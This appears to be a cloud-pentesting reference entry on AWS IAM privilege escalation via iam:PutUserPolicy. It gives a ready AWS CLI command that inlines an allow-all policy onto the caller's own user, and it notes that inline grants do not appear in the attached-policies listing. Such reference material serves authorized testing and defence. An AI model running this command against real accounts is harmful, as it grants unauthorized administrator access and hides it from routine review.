iam:PutUserPolicy writes an inline policy directly onto a user, no managed policy involved. Inline an allow-all statement onto your own user and you are administrator, with the grant living on the user rather than as a separate attachable object.
Inline admin#
aws iam put-user-policy --user-name <you> --policy-name esc \
--policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'
Exploitation notes#
- Inline policies do not show up in
list-attached-user-policies; they are read withlist-user-policiesandget-user-policy. - This needs only
iam:PutUserPolicy, no policy-creation permission.
Tools#
- AWS CLI (
iam put-user-policy). - Pacu (
iam__privesc_scan).